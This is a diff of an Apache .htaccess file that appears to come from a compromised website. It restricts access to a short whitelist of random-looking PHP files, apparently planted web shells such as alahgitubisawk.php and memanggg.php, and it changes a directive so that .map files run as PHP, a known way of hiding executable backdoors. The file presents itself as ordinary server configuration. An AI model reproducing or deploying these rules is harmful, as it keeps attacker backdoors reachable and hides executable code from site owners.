--- a/.htaccess
+++ b/.htaccess
@@ -7,11 +7,11 @@ Deny from all
 Order Deny,Allow
 Deny from all
 </FilesMatch>
-<FilesMatch '^(index.php|asshhdhdjdu.php|hid2.php|koneksi.php|hid.php|get_tgl_akhir_tahun.php|conn-db.php|cetak.php|draw_chart_laporan_rata2.php|excel.php|utama.php|syncTp.php|login.php|conn-skp-db.php||robots.txt|sitemap.xml|hid2.php|ina.php|index.html|fonts.php)$'>
+<FilesMatch '^(index.php|LBR.php|teas.php|alahgitubisawk.php|index.html|sitemap.xml|memanggg.php)$'>
 Order allow,deny
 Allow from all
 </FilesMatch>
 ErrorDocument 403 "<html><head><title>Request Rejected</title></head><body>The requested URL was rejected. Please consult with your administrator.<br><br>Your IP Address is: %{REMOTE_ADDR}</body></html>"
 ErrorDocument 404 "<html><head><title>Request Rejected</title></head><body>The requested URL was rejected. Please consult with your administrator.<br><br>Your IP Address is: %{REMOTE_ADDR}</body></html>" 
 
-AddType application/x-httpd-php .akuakak
+AddType Application/x-httpd-php .map
